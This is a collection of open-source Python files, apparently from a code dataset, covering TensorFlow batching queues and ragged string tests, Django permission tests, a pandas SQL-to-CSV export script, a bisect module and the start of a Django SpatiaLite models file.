  # NOTE(review): collections.Sequence is the pre-Python-3.3 spelling; on
  # Python >= 3.10 this must be collections.abc.Sequence.
  received_sequence = isinstance(serialized_list, collections.Sequence)
  if not received_sequence:
    serialized_list = (serialized_list,)
  # info.rank is a single example's rank; +1 restores the batch dimension
  # added by dequeue_many.
  tensors = [
      sparse_ops.deserialize_many_sparse(s, info.dtype, (info.rank + 1).value)
      if info.sparse else s
      for (s, info)
      in zip(serialized_list, sparse_info_list)]
  return tensors if received_sequence else tensors[0]
def _validate(tensor_list):
  """Convert to tensors and require a non-empty list (for batch())."""
  converted = ops.convert_n_to_tensor_or_indexed_slices(tensor_list)
  if not converted:
    raise ValueError("Expected at least one tensor in batch().")
  return converted
def _validate_join(tensor_list_list):
  """Convert each inner list to tensors; require a non-empty outer list."""
  converted = [ops.convert_n_to_tensor_or_indexed_slices(tl)
               for tl in tensor_list_list]
  if not converted:
    raise ValueError("Expected at least one input in batch_join().")
  return converted
def _dtypes(tensor_list_list):
  """Return the dtypes of the first tensor list, checking all lists agree.

  Raises:
    TypeError: if any list's dtypes differ from the first list's.
  """
  def _names(type_list):
    return ", ".join(t.name for t in type_list)

  expected = [t.dtype for t in tensor_list_list[0]]
  for tensor_list in tensor_list_list[1:]:
    found = [t.dtype for t in tensor_list]
    if found != expected:
      raise TypeError("Expected types to be consistent: %s vs. %s." %
                      (_names(expected), _names(found)))
  return expected
def _merge_shapes(shape_list, enqueue_many):
  """Merge a list of shapes into a single shape, returned as a Python list.

  Args:
    shape_list: Shapes (anything `tensor_shape.as_shape` accepts).
    enqueue_many: If True, strip the leading (batch) dimension before
      merging, since per-example shapes are what the queue stores.

  Returns:
    The merged shape as a list of dimension values.
  """
  shape_list = [tensor_shape.as_shape(s) for s in shape_list]
  if enqueue_many:
    # We want the shapes without the leading batch dimension.
    shape_list = [s.with_rank_at_least(1)[1:] for s in shape_list]
  merged_shape = shape_list[0]
  for s in shape_list[1:]:
    merged_shape.merge_with(s)
  return merged_shape.as_list()
def _shapes(tensor_list_list, shapes, enqueue_many):
  """Calculate and merge the shapes of incoming tensors.

  Args:
    tensor_list_list: List of tensor lists.
    shapes: List of shape tuples corresponding to tensors within the lists.
    enqueue_many: Boolean describing whether shapes will be enqueued as
      batches or individual entries.

  Returns:
    A list of shapes aggregating shape inference info from `tensor_list_list`,
    or returning `shapes` if it is not `None`.

  Raises:
    ValueError: If any of the inferred shapes in `tensor_list_list` lack a
      well defined rank.
  """
  if shapes is None:
    # Infer shapes position-by-position across all lists; every tensor must
    # at least have a known rank for the merge to be meaningful.
    len0 = len(tensor_list_list[0])
    for tl in tensor_list_list:
      for i in xrange(len0):
        if tl[i].get_shape().ndims is None:
          raise ValueError("Cannot infer Tensor's rank: %s" % tl[i])
    shapes = [_merge_shapes(
        [tl[i].get_shape().as_list() for tl in tensor_list_list], enqueue_many)
        for i in xrange(len0)]
  return shapes
def _enqueue_join(queue, tensor_list_list, enqueue_many):
  """Add one enqueue op per inner list and register a QueueRunner."""
  enqueue_fn = queue.enqueue_many if enqueue_many else queue.enqueue
  enqueue_ops = [enqueue_fn(tl) for tl in tensor_list_list]
  queue_runner.add_queue_runner(queue_runner.QueueRunner(queue, enqueue_ops))
def _enqueue(queue, tensor_list, threads, enqueue_many):
  """Register a QueueRunner driving `threads` copies of one enqueue op."""
  if enqueue_many:
    op = queue.enqueue_many(tensor_list)
  else:
    op = queue.enqueue(tensor_list)
  queue_runner.add_queue_runner(
      queue_runner.QueueRunner(queue, [op] * threads))
def _which_queue(dynamic_pad):
  """Pick the queue class: a padding queue iff `dynamic_pad` is set."""
  if dynamic_pad:
    return data_flow_ops.PaddingFIFOQueue
  return data_flow_ops.FIFOQueue
# Batching functions ----------------------------------------------------------
def batch(tensors, batch_size, num_threads=1, capacity=32,
          enqueue_many=False, shapes=None, dynamic_pad=False,
          shared_name=None, name=None):
  """Creates batches of tensors in `tensors`.

  The argument `tensors` can be a list or a dictionary of tensors.
  The value returned by the function will be of the same type
  as `tensors`.

  This function is implemented using a queue. A `QueueRunner` for the
  queue is added to the current `Graph`'s `QUEUE_RUNNER` collection.

  If `enqueue_many` is `False`, `tensors` is assumed to represent a single
  example. An input tensor with shape `[x, y, z]` will be output as a tensor
  with shape `[batch_size, x, y, z]`.

  If `enqueue_many` is `True`, `tensors` is assumed to represent a batch of
  examples, where the first dimension is indexed by example, and all members of
  `tensor_list` should have the same size in the first dimension. If an input
  tensor has shape `[*, x, y, z]`, the output will have shape `[batch_size, x,
  y, z]`. The `capacity` argument controls how long the prefetching is
  allowed to grow the queues.

  The returned operation is a dequeue operation and will throw
  `tf.errors.OutOfRangeError` if the input queue is exhausted. If this
  operation is feeding another input queue, its queue runner will catch
  this exception, however, if this operation is used in your main thread
  you are responsible for catching this yourself.

  *N.B.:* If `dynamic_pad` is `False`, you must ensure that either
  (i) the `shapes` argument is passed, or (ii) all of the tensors in
  `tensors` must have fully-defined shapes. `ValueError` will be
  raised if neither of these conditions holds.

  If `dynamic_pad` is `True`, it is sufficient that the *rank* of the
  tensors is known, but individual dimensions may have shape `None`.
  In this case, for each enqueue the dimensions with value `None`
  may have a variable length; upon dequeue, the output tensors will be padded
  on the right to the maximum shape of the tensors in the current minibatch.
  For numbers, this padding takes value 0. For strings, this padding is
  the empty string. See `PaddingFIFOQueue` for more info.

  Args:
    tensors: The list or dictionary of tensors to enqueue.
    batch_size: The new batch size pulled from the queue.
    num_threads: The number of threads enqueuing `tensor_list`.
    capacity: An integer. The maximum number of elements in the queue.
    enqueue_many: Whether each tensor in `tensor_list` is a single example.
    shapes: (Optional) The shapes for each example. Defaults to the
      inferred shapes for `tensor_list`.
    dynamic_pad: Boolean. Allow variable dimensions in input shapes.
      The given dimensions are padded upon dequeue so that tensors within a
      batch have the same shapes.
    shared_name: (optional). If set, this queue will be shared under the given
      name across multiple sessions.
    name: (Optional) A name for the operations.

  Returns:
    A list or dictionary of tensors with the same types as `tensors`.

  Raises:
    ValueError: If the `shapes` are not specified, and cannot be
      inferred from the elements of `tensors`.
  """
  tensor_list = _as_tensor_list(tensors)
  with ops.op_scope(tensor_list, name, "batch") as name:
    tensor_list = _validate(tensor_list)
    # SparseTensors are serialized into dense string tensors so they can
    # pass through the queue; they are deserialized again after dequeue.
    (tensor_list, sparse_info) = _serialize_sparse_tensors(
        tensor_list, enqueue_many)
    types = _dtypes([tensor_list])
    shapes = _shapes([tensor_list], shapes, enqueue_many)
    # TODO(josh11b,mrry): Switch to BatchQueue once it is written.
    queue = _which_queue(dynamic_pad)(
        capacity=capacity, dtypes=types, shapes=shapes, shared_name=shared_name)
    _enqueue(queue, tensor_list, num_threads, enqueue_many)
    # Report queue fullness as a fraction in [0, 1] for monitoring.
    logging_ops.scalar_summary(
        "queue/%s/fraction_of_%d_full" % (queue.name, capacity),
        math_ops.cast(queue.size(), dtypes.float32) * (1. / capacity))

    dequeued = queue.dequeue_many(batch_size, name=name)
    dequeued = _deserialize_sparse_tensors(dequeued, sparse_info)
    return _as_original_type(tensors, dequeued)
# TODO(josh11b): Add a thread_multiplier or num_threads (that has to be
# a multiple of len(tensor_list_list)?) parameter, to address the use
# case where you want more parallelism than you can support different
# readers (either because you don't have that many files or can't
# read that many files in parallel due to the number of seeks required).
# Once this is done, batch() can be written as a call to batch_join().
def batch_join(tensors_list, batch_size, capacity=32, enqueue_many=False,
               shapes=None, dynamic_pad=False,
               shared_name=None, name=None):
  """Runs a list of tensors to fill a queue to create batches of examples.

  The `tensors_list` argument is a list of tuples of tensors, or a list of
  dictionaries of tensors. Each element in the list is treated similarly
  to the `tensors` argument of `tf.train.batch()`.

  Enqueues a different list of tensors in different threads.
  Implemented using a queue -- a `QueueRunner` for the queue
  is added to the current `Graph`'s `QUEUE_RUNNER` collection.

  `len(tensors_list)` threads will be started,
  with thread `i` enqueuing the tensors from
  `tensors_list[i]`. `tensors_list[i1][j]` must match
  `tensors_list[i2][j]` in type and shape, except in the first
  dimension if `enqueue_many` is true.

  If `enqueue_many` is `False`, each `tensors_list[i]` is assumed
  to represent a single example. An input tensor `x` will be output as a
  tensor with shape `[batch_size] + x.shape`.

  If `enqueue_many` is `True`, `tensors_list[i]` is assumed to
  represent a batch of examples, where the first dimension is indexed
  by example, and all members of `tensors_list[i]` should have the
  same size in the first dimension. The slices of any input tensor
  `x` are treated as examples, and the output tensors will have shape
  `[batch_size] + x.shape[1:]`.

  The `capacity` argument controls how long the prefetching is allowed to
  grow the queues.

  The returned operation is a dequeue operation and will throw
  `tf.errors.OutOfRangeError` if the input queue is exhausted. If this
  operation is feeding another input queue, its queue runner will catch
  this exception, however, if this operation is used in your main thread
  you are responsible for catching this yourself.

  *N.B.:* If `dynamic_pad` is `False`, you must ensure that either
  (i) the `shapes` argument is passed, or (ii) all of the tensors in
  `tensors_list` must have fully-defined shapes. `ValueError` will be
  raised if neither of these conditions holds.

  If `dynamic_pad` is `True`, it is sufficient that the *rank* of the
  tensors is known, but individual dimensions may have value `None`.
  In this case, for each enqueue the dimensions with value `None`
  may have a variable length; upon dequeue, the output tensors will be padded
  on the right to the maximum shape of the tensors in the current minibatch.
  For numbers, this padding takes value 0. For strings, this padding is
  the empty string. See `PaddingFIFOQueue` for more info.

  Args:
    tensors_list: A list of tuples or dictionaries of tensors to enqueue.
    batch_size: An integer. The new batch size pulled from the queue.
    capacity: An integer. The maximum number of elements in the queue.
    enqueue_many: Whether each tensor in `tensor_list_list` is a single
      example.
    shapes: (Optional) The shapes for each example. Defaults to the
      inferred shapes for `tensor_list_list[i]`.
    dynamic_pad: Boolean. Allow variable dimensions in input shapes.
      The given dimensions are padded upon dequeue so that tensors within a
      batch have the same shapes.
    shared_name: (Optional) If set, this queue will be shared under the given
      name across multiple sessions.
    name: (Optional) A name for the operations.

  Returns:
    A list or dictionary of tensors with the same number and types as
    `tensors_list[i]`.

  Raises:
    ValueError: If the `shapes` are not specified, and cannot be
      inferred from the elements of `tensor_list_list`.
  """
  tensor_list_list = _as_tensor_list_list(tensors_list)
  with ops.op_scope(_flatten(tensor_list_list), name, "batch_join") as name:
    tensor_list_list = _validate_join(tensor_list_list)
    # SparseTensors are serialized so they can pass through the queue and
    # deserialized again after dequeue.
    tensor_list_list, sparse_info = _serialize_sparse_tensors_join(
        tensor_list_list, enqueue_many)
    types = _dtypes(tensor_list_list)
    shapes = _shapes(tensor_list_list, shapes, enqueue_many)
    # TODO(josh11b,mrry): Switch to BatchQueue once it is written.
    queue = _which_queue(dynamic_pad)(
        capacity=capacity, dtypes=types, shapes=shapes, shared_name=shared_name)
    # One enqueue op (and hence one thread) per input list.
    _enqueue_join(queue, tensor_list_list, enqueue_many)
    # Report queue fullness as a fraction in [0, 1] for monitoring.
    logging_ops.scalar_summary(
        "queue/%s/fraction_of_%d_full" % (queue.name, capacity),
        math_ops.cast(queue.size(), dtypes.float32) * (1. / capacity))

    dequeued = queue.dequeue_many(batch_size, name=name)
    dequeued = _deserialize_sparse_tensors(dequeued, sparse_info)
    # tensors_list was validated to not be empty.
    return _as_original_type(tensors_list[0], dequeued)
def shuffle_batch(tensors, batch_size, capacity, min_after_dequeue,
                  num_threads=1, seed=None, enqueue_many=False, shapes=None,
                  shared_name=None, name=None):
  """Creates batches by randomly shuffling tensors.

  This function adds the following to the current `Graph`:

  * A shuffling queue into which tensors from `tensors` are enqueued.
  * A `dequeue_many` operation to create batches from the queue.
  * A `QueueRunner` to `QUEUE_RUNNER` collection, to enqueue the tensors
    from `tensors`.

  If `enqueue_many` is `False`, `tensors` is assumed to represent a
  single example. An input tensor with shape `[x, y, z]` will be output
  as a tensor with shape `[batch_size, x, y, z]`.

  If `enqueue_many` is `True`, `tensors` is assumed to represent a
  batch of examples, where the first dimension is indexed by example,
  and all members of `tensors` should have the same size in the
  first dimension. If an input tensor has shape `[*, x, y, z]`, the
  output will have shape `[batch_size, x, y, z]`.

  The `capacity` argument controls how long the prefetching is allowed to
  grow the queues.

  The returned operation is a dequeue operation and will throw
  `tf.errors.OutOfRangeError` if the input queue is exhausted. If this
  operation is feeding another input queue, its queue runner will catch
  this exception, however, if this operation is used in your main thread
  you are responsible for catching this yourself.

  For example:

  ```python
  # Creates batches of 32 images and 32 labels.
  image_batch, label_batch = tf.train.shuffle_batch(
        [single_image, single_label],
        batch_size=32,
        num_threads=4,
        capacity=50000,
        min_after_dequeue=10000)
  ```

  *N.B.:* You must ensure that either (i) the `shapes` argument is
  passed, or (ii) all of the tensors in `tensors` must have
  fully-defined shapes. `ValueError` will be raised if neither of
  these conditions holds.

  Args:
    tensors: The list or dictionary of tensors to enqueue.
    batch_size: The new batch size pulled from the queue.
    capacity: An integer. The maximum number of elements in the queue.
    min_after_dequeue: Minimum number elements in the queue after a
      dequeue, used to ensure a level of mixing of elements.
    num_threads: The number of threads enqueuing `tensor_list`.
    seed: Seed for the random shuffling within the queue.
    enqueue_many: Whether each tensor in `tensor_list` is a single example.
    shapes: (Optional) The shapes for each example. Defaults to the
      inferred shapes for `tensor_list`.
    shared_name: (Optional) If set, this queue will be shared under the given
      name across multiple sessions.
    name: (Optional) A name for the operations.

  Returns:
    A list or dictionary of tensors with the types as `tensors`.

  Raises:
    ValueError: If the `shapes` are not specified, and cannot be
      inferred from the elements of `tensors`.
  """
  tensor_list = _as_tensor_list(tensors)
  with ops.op_scope(tensor_list, name, "shuffle_batch") as name:
    tensor_list = _validate(tensor_list)
    # SparseTensors are serialized so they can pass through the queue and
    # deserialized again after dequeue.
    tensor_list, sparse_info = _serialize_sparse_tensors(
        tensor_list, enqueue_many)
    types = _dtypes([tensor_list])
    shapes = _shapes([tensor_list], shapes, enqueue_many)
    queue = data_flow_ops.RandomShuffleQueue(
        capacity=capacity, min_after_dequeue=min_after_dequeue, seed=seed,
        dtypes=types, shapes=shapes, shared_name=shared_name)
    _enqueue(queue, tensor_list, num_threads, enqueue_many)
    # Summarize how full the queue is beyond its shuffling floor: 0 means
    # only min_after_dequeue elements remain, 1 means the queue is full.
    full = (math_ops.cast(math_ops.maximum(0, queue.size() - min_after_dequeue),
                          dtypes.float32) *
            (1. / (capacity - min_after_dequeue)))
    # Note that name contains a '/' at the end so we intentionally do not place
    # a '/' after %s below.
    summary_name = (
        "queue/%sfraction_over_%d_of_%d_full" %
        (name, min_after_dequeue, capacity - min_after_dequeue))
    logging_ops.scalar_summary(summary_name, full)

    dequeued = queue.dequeue_many(batch_size, name=name)
    dequeued = _deserialize_sparse_tensors(dequeued, sparse_info)
    return _as_original_type(tensors, dequeued)
def shuffle_batch_join(tensors_list, batch_size, capacity,
                       min_after_dequeue, seed=None, enqueue_many=False,
                       shapes=None, shared_name=None, name=None):
  """Create batches by randomly shuffling tensors.

  The `tensors_list` argument is a list of tuples of tensors, or a list of
  dictionaries of tensors. Each element in the list is treated similarly
  to the `tensors` argument of `tf.train.shuffle_batch()`.

  This version enqueues a different list of tensors in different threads.
  It adds the following to the current `Graph`:

  * A shuffling queue into which tensors from `tensors_list` are enqueued.
  * A `dequeue_many` operation to create batches from the queue.
  * A `QueueRunner` to `QUEUE_RUNNER` collection, to enqueue the tensors
    from `tensors_list`.

  `len(tensors_list)` threads will be started, with thread `i` enqueuing
  the tensors from `tensors_list[i]`. `tensors_list[i1][j]` must match
  `tensors_list[i2][j]` in type and shape, except in the first dimension if
  `enqueue_many` is true.

  If `enqueue_many` is `False`, each `tensors_list[i]` is assumed
  to represent a single example. An input tensor with shape `[x, y, z]`
  will be output as a tensor with shape `[batch_size, x, y, z]`.

  If `enqueue_many` is `True`, `tensors_list[i]` is assumed to
  represent a batch of examples, where the first dimension is indexed
  by example, and all members of `tensors_list[i]` should have the
  same size in the first dimension. If an input tensor has shape `[*, x,
  y, z]`, the output will have shape `[batch_size, x, y, z]`.

  The `capacity` argument controls how long the prefetching is allowed to
  grow the queues.

  The returned operation is a dequeue operation and will throw
  `tf.errors.OutOfRangeError` if the input queue is exhausted. If this
  operation is feeding another input queue, its queue runner will catch
  this exception, however, if this operation is used in your main thread
  you are responsible for catching this yourself.

  Args:
    tensors_list: A list of tuples or dictionaries of tensors to enqueue.
    batch_size: An integer. The new batch size pulled from the queue.
    capacity: An integer. The maximum number of elements in the queue.
    min_after_dequeue: Minimum number elements in the queue after a
      dequeue, used to ensure a level of mixing of elements.
    seed: Seed for the random shuffling within the queue.
    enqueue_many: Whether each tensor in `tensor_list_list` is a single
      example.
    shapes: (Optional) The shapes for each example. Defaults to the
      inferred shapes for `tensors_list[i]`.
    shared_name: (optional). If set, this queue will be shared under the given
      name across multiple sessions.
    name: (Optional) A name for the operations.

  Returns:
    A list or dictionary of tensors with the same number and types as
    `tensors_list[i]`.

  Raises:
    ValueError: If the `shapes` are not specified, and cannot be
      inferred from the elements of `tensors_list`.
  """
  tensor_list_list = _as_tensor_list_list(tensors_list)
  with ops.op_scope(
      _flatten(tensor_list_list), name, "shuffle_batch_join") as name:
    tensor_list_list = _validate_join(tensor_list_list)
    # SparseTensors are serialized so they can pass through the queue and
    # deserialized again after dequeue.
    tensor_list_list, sparse_info = _serialize_sparse_tensors_join(
        tensor_list_list, enqueue_many)
    types = _dtypes(tensor_list_list)
    shapes = _shapes(tensor_list_list, shapes, enqueue_many)
    queue = data_flow_ops.RandomShuffleQueue(
        capacity=capacity, min_after_dequeue=min_after_dequeue, seed=seed,
        dtypes=types, shapes=shapes, shared_name=shared_name)
    # One enqueue op (and hence one thread) per input list.
    _enqueue_join(queue, tensor_list_list, enqueue_many)
    # Summarize how full the queue is beyond its shuffling floor: 0 means
    # only min_after_dequeue elements remain, 1 means the queue is full.
    full = (math_ops.cast(math_ops.maximum(0, queue.size() - min_after_dequeue),
                          dtypes.float32) *
            (1. / (capacity - min_after_dequeue)))
    # Note that name contains a '/' at the end so we intentionally do not place
    # a '/' after %s below.
    summary_name = (
        "queue/%sfraction_over_%d_of_%d_full" %
        (name, min_after_dequeue, capacity - min_after_dequeue))
    logging_ops.scalar_summary(summary_name, full)

    dequeued = queue.dequeue_many(batch_size, name=name)
    dequeued = _deserialize_sparse_tensors(dequeued, sparse_info)
    # tensors_list was validated to not be empty.
    return _as_original_type(tensors_list[0], dequeued)
| apache-2.0 |
vintasoftware/django-role-permissions | rolepermissions/tests/test_permissions.py | 1 | 2083 |
from django.test import TestCase
from rolepermissions.permissions import PermissionsManager, register_object_checker
from rolepermissions.exceptions import CheckerNotRegistered
class PermissionsManagerTests(TestCase):
    """Unit tests for the PermissionsManager checker registry."""

    def setUp(self):
        # Start every test from an empty registry so tests are independent.
        PermissionsManager._checkers = {}

    def test_register_checker(self):
        # Registering stores the callable under the given name.
        def func():
            pass

        PermissionsManager.register_checker('func_name', func)

        self.assertIn('func_name', PermissionsManager._checkers)
        self.assertEquals(PermissionsManager._checkers['func_name'], func)

    def test_get_checkers(self):
        # With nothing registered, the registry is an empty dict.
        self.assertEquals(PermissionsManager.get_checkers(), {})

    def test_retrieve_checker(self):
        # retrieve_checker returns exactly the callable that was registered.
        def func():
            pass

        PermissionsManager.register_checker('func_name', func)

        self.assertEquals(PermissionsManager.retrieve_checker('func_name'), func)

    def test_restore_unregistered_function(self):
        # Looking up a name that was never registered must raise.
        with self.assertRaises(CheckerNotRegistered):
            PermissionsManager.retrieve_checker('func_name')
class RegisterObjectCheckerDecoratorTests(TestCase):
    """Unit tests for the register_object_checker decorator."""

    def setUp(self):
        # Start every test from an empty registry so tests are independent.
        PermissionsManager._checkers = {}

    def test_registers_function(self):
        # (Renamed from the misspelled "test_resgisters_function".)
        # Decorating with no argument registers under the function's own name.
        @register_object_checker()
        def function_name(a, b, c):
            return True

        self.assertIn('function_name', PermissionsManager.get_checkers())
        restore_function = PermissionsManager.retrieve_checker('function_name')
        self.assertTrue(restore_function('', '', ''))

    def test_register_function_with_different_name(self):
        # (Renamed from the misspelled "..._with_diferent_name".)
        # Passing a name registers the checker under that name instead.
        @register_object_checker('new_name')
        def function_name(a, b, c):
            return True

        self.assertIn('new_name', PermissionsManager.get_checkers())
        restore_function = PermissionsManager.retrieve_checker('new_name')
        self.assertTrue(restore_function('', '', ''))

    def test_register_function_call(self):
        # The decorator must return the original function, still callable.
        @register_object_checker()
        def function_name(a, b, c):
            return True

        self.assertTrue(function_name('', '', ''))
| mit |
chankeypathak/pandas-matplotlib-examples | Lesson 9/export.py | 1 | 1179 | import pandas as pd
from sqlalchemy import create_engine, MetaData, Table, select

# Script: connect to a SQL Server database via SQLAlchemy/pyodbc, read every
# row of one table, and export the rows as CSV, XLS and TXT files.

# Parameters
TableName = "data"

# Connection settings. Windows ("trusted") authentication is used, so the
# port/username/password entries are left commented out.
DB = {
    'drivername': 'mssql+pyodbc',
    'servername': 'DAVID-THINK',
    #'port': '5432',
    #'username': 'lynn',
    #'password': '',
    'database': 'BizIntel',
    'driver': 'SQL Server Native Client 11.0',
    'trusted_connection': 'yes',
    'legacy_schema_aliasing': False
}

# Create the connection (URL is assembled from the DB settings above).
engine = create_engine(DB['drivername'] + '://' + DB['servername'] + '/' + DB['database'] + '?' + 'driver=' + DB['driver'] + ';' + 'trusted_connection=' + DB['trusted_connection'], legacy_schema_aliasing=DB['legacy_schema_aliasing'])
conn = engine.connect()

# Required for querying tables
metadata = MetaData(conn)

# Reflect the table definition from the database (schema "dbo").
tbl = Table(TableName, metadata, autoload=True, schema="dbo")
#tbl.create(checkfirst=True)

# Select all rows of the table.
sql = tbl.select()

# run sql code
result = conn.execute(sql)

# Load the result set into a DataFrame, preserving the column names.
df = pd.DataFrame(data=list(result), columns=result.keys())

# Close connection
conn.close()

print('Done')

# Export the same data in three formats. Note the .txt file is written with
# to_csv, so it is CSV-formatted text.
df.to_csv('DimDate.csv', index=False)
df.to_excel('DimDate.xls', index=False)
df.to_csv('DimDate.txt', index=False)
aam-at/tensorflow | tensorflow/python/ops/ragged/strings_reduce_join_op_test.py | 15 | 5488 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.strings.reduce_join."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_string_ops
from tensorflow.python.platform import googletest
@test_util.run_all_in_graph_and_eager_modes
class StringsReduceJoinOpTest(test_util.TensorFlowTestCase,
                              parameterized.TestCase):
  """Unit tests for ragged_string_ops.reduce_join on dense and ragged inputs."""
  def test_rank_one(self):
    """A dense rank-1 string list joined over axis -1 yields a scalar string."""
    input_array = [b'this', b'is', b'a', b'test']
    truth = b'thisisatest'
    truth_shape = []
    with self.cached_session():
      output = ragged_string_ops.reduce_join(
          inputs=input_array, axis=-1, keepdims=False, separator='')
      output_array = self.evaluate(output)
    self.assertAllEqual(truth, output_array)
    self.assertAllEqual(truth_shape, output.get_shape())
  # Each parameter dict is one scenario: ragged inputs of ranks 2-4 joined
  # along positive and negative axes, with and without a separator.
  # 'truth_shape' uses None for ragged (unknown-length) dimensions.
  @parameterized.parameters([
      {
          'input_array': [[
              b'this', b'is', b'a', b'test', b'for', b'ragged', b'tensors'
          ], [b'please', b'do', b'not', b'panic', b'!']],
          'axis': 0,
          'keepdims': False,
          'truth': [
              b'thisplease', b'isdo', b'anot', b'testpanic', b'for!', b'ragged',
              b'tensors'
          ],
          'truth_shape': [7],
      },
      {
          'input_array': [[
              b'this', b'is', b'a', b'test', b'for', b'ragged', b'tensors'
          ], [b'please', b'do', b'not', b'panic', b'!']],
          'axis': 1,
          'keepdims': False,
          'truth': [b'thisisatestforraggedtensors', b'pleasedonotpanic!'],
          'truth_shape': [2],
      },
      {
          'input_array': [[
              b'this', b'is', b'a', b'test', b'for', b'ragged', b'tensors'
          ], [b'please', b'do', b'not', b'panic', b'!']],
          'axis': 1,
          'keepdims': False,
          'truth': [
              b'this|is|a|test|for|ragged|tensors', b'please|do|not|panic|!'
          ],
          'truth_shape': [2],
          'separator': '|',
      },
      {
          'input_array': [[[b'a', b'b'], [b'b', b'c']], [[b'dd', b'ee']]],
          'axis': -1,
          'keepdims': False,
          'truth': [[b'a|b', b'b|c'], [b'dd|ee']],
          'truth_shape': [2, None],
          'separator': '|',
      },
      {
          'input_array': [[[[b'a', b'b', b'c'], [b'dd', b'ee']]],
                          [[[b'f', b'g', b'h'], [b'ii', b'jj']]]],
          'axis': -2,
          'keepdims': False,
          'truth': [[[b'a|dd', b'b|ee', b'c']], [[b'f|ii', b'g|jj', b'h']]],
          'truth_shape': [2, None, None],
          'separator': '|',
      },
      {
          'input_array': [[[b't', b'h', b'i', b's'], [b'i', b's'], [b'a'],
                           [b't', b'e', b's', b't']],
                          [[b'p', b'l', b'e', b'a', b's', b'e'],
                           [b'p', b'a', b'n', b'i', b'c']]],
          'axis': -1,
          'keepdims': False,
          'truth': [[b'this', b'is', b'a', b'test'], [b'please', b'panic']],
          'truth_shape': [2, None],
          'separator': '',
      },
      {
          'input_array': [[[[b't'], [b'h'], [b'i'], [b's']], [[b'i', b's']],
                           [[b'a', b'n']], [[b'e'], [b'r'], [b'r']]],
                          [[[b'p'], [b'l'], [b'e'], [b'a'], [b's'], [b'e']],
                           [[b'p'], [b'a'], [b'n'], [b'i'], [b'c']]]],
          'axis': -1,
          'keepdims': False,
          'truth': [[[b't', b'h', b'i', b's'], [b'is'], [b'an'],
                     [b'e', b'r', b'r']],
                    [[b'p', b'l', b'e', b'a', b's', b'e'],
                     [b'p', b'a', b'n', b'i', b'c']]],
          'truth_shape': [2, None, None],
          'separator': '',
      },
  ])
  def test_different_ranks(self,
                           input_array,
                           axis,
                           keepdims,
                           truth,
                           truth_shape,
                           separator=''):
    """Checks reduce_join output values and static shape for each scenario."""
    with self.cached_session():
      input_tensor = ragged_factory_ops.constant(input_array)
      output = ragged_string_ops.reduce_join(
          inputs=input_tensor,
          axis=axis,
          keepdims=keepdims,
          separator=separator)
      output_array = self.evaluate(output)
    self.assertAllEqual(truth, output_array)
    # Normalize legacy Dimension objects to plain ints/None before comparing.
    if all(isinstance(s, tensor_shape.Dimension) for s in output.shape):
      output_shape = [dim.value for dim in output.shape]
    else:
      output_shape = output.shape
    self.assertAllEqual(truth_shape, output_shape)
# Standard entry point so the test module can be executed directly.
if __name__ == '__main__':
  googletest.main()
| apache-2.0 |
40223117cda/w17test | static/Brython3.1.1-20150328-091302/Lib/bisect.py | 1261 | 2595 | """Bisection algorithms."""
def insort_right(a, x, lo=0, hi=None):
    """Insert x into the sorted list a, after any entries equal to x.

    Only the slice a[lo:hi] is searched (hi defaults to len(a)); the list
    is assumed to already be sorted.  Raises ValueError if lo is negative.
    """
    if lo < 0:
        raise ValueError('lo must be non-negative')
    upper = len(a) if hi is None else hi
    lower = lo
    # Classic binary search converging on the rightmost insertion point:
    # elements equal to x are treated as "smaller", pushing lower past them.
    while lower < upper:
        middle = (lower + upper) // 2
        if x < a[middle]:
            upper = middle
        else:
            lower = middle + 1
    a.insert(lower, x)
insort = insort_right # backward compatibility
def bisect_right(a, x, lo=0, hi=None):
    """Return the rightmost index at which x could be inserted in sorted a.

    All elements of a[:result] compare <= x and all of a[result:] compare
    > x, so list.insert(result, x) lands just after any existing x.
    Only the slice a[lo:hi] is searched (hi defaults to len(a)).
    Raises ValueError if lo is negative.
    """
    if lo < 0:
        raise ValueError('lo must be non-negative')
    upper = len(a) if hi is None else hi
    lower = lo
    # Only '<' is used for comparisons, matching the stdlib contract
    # (element types need not implement '<='.)
    while lower < upper:
        middle = (lower + upper) // 2
        if x < a[middle]:
            upper = middle
        else:
            lower = middle + 1
    return lower
bisect = bisect_right # backward compatibility
def insort_left(a, x, lo=0, hi=None):
    """Insert x into the sorted list a, before any entries equal to x.

    Only the slice a[lo:hi] is searched (hi defaults to len(a)); the list
    is assumed to already be sorted.  Raises ValueError if lo is negative.
    """
    if lo < 0:
        raise ValueError('lo must be non-negative')
    upper = len(a) if hi is None else hi
    lower = lo
    # Binary search for the leftmost insertion point: elements equal to x
    # are treated as "larger", pulling upper back onto them.
    while lower < upper:
        middle = (lower + upper) // 2
        if a[middle] < x:
            lower = middle + 1
        else:
            upper = middle
    a.insert(lower, x)
def bisect_left(a, x, lo=0, hi=None):
    """Return the leftmost index at which x could be inserted in sorted a.

    All elements of a[:result] compare < x and all of a[result:] compare
    >= x, so list.insert(result, x) lands just before any existing x.
    Only the slice a[lo:hi] is searched (hi defaults to len(a)).
    Raises ValueError if lo is negative.
    """
    if lo < 0:
        raise ValueError('lo must be non-negative')
    upper = len(a) if hi is None else hi
    lower = lo
    # Only '<' is used for comparisons, matching the stdlib contract.
    while lower < upper:
        middle = (lower + upper) // 2
        if a[middle] < x:
            lower = middle + 1
        else:
            upper = middle
    return lower
# Overwrite above definitions with a fast C implementation
# The import is optional: interpreters without the _bisect accelerator
# module (e.g. Brython, which ships this file) keep the pure-Python
# versions defined above.
try:
    from _bisect import *
except ImportError:
    pass
| gpl-3.0 |
jaywreddy/django | django/contrib/gis/db/backends/spatialite/models.py | 510 | 2946 | """
The GeometryColumns and SpatialRefSys models for the SpatiaLite backend.
"""
from django.contrib.gis.db.backends.base.models import SpatialRefSysMixin
from django.contrib.gis.db.backends.spatialite.base import DatabaseWrapper
from django.db import connection, models
from django.db.backends.signals import connection_created
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
